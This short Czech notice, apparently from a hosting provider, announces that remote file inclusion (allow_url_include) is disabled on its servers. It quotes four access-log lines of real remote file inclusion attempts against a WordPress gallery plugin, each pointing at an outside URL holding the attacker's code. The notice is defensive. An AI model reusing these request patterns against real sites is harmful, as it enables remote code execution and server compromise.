Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce Include a Require načtení zdrojového souboru z cizího webové serveru, tj. přes http nebo ftp. Na funkce fopen() by tato změna neměla mít vliv. Pokud byste potřebovali nahrávat věci z cizího serveru, použijte buď již zmiňovanou funkci fopen() nebo file_get_contents().
Zákaz jsme provedli přes direktivu allow_url_include = Off.
A jak takový útok např. může vypadat? Ukázka z logu – komentář snad netřeba:
xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:18 +0100] "GET /?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1" 200 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
xxxx.cz 80.254.74.63 – - [08/Dec/2008:18:11:14 +0100] „GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 „-“ „Mozilla/3.0 (compatible; Indy Library)“
xxxx.cz 80.254.74.63 – - [08/Dec/2008:18:14:33 +0100] „GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 „-“ „Mozilla/3.0 (compatible; Indy Library)“
xxxx.cz 76.162.254.213 – - [08/Dec/2008:18:58:40 +0100] „GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pastebin.linode.com/?dl=1581??? HTTP/1.1″ 200 227 „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1″